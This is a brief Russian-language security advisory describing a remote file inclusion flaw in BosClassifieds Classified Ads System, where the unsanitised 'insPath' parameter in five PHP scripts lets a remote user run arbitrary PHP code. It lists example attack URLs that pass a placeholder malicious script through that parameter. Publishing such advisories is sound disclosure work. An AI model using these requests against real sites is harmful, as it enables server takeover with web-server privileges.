• Партнер

  • Программа: BosClassifieds Classified Ads System

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "insPath" в сценариях index.php, recent.php, account.php, classified.php и search.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:

    http://www.site.com/[path]/index.php?insPath=[evil_script]
    http://www.site.com/[path]/recent.php?insPath=[evil_script]
    http://www.site.com/[path]/account.php?insPath=[evil_script]
    http://www.site.com/[path]/classified.php?insPath=[evil_script]
    http://www.site.com/[path]/search.php?insPath=[evil_script]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии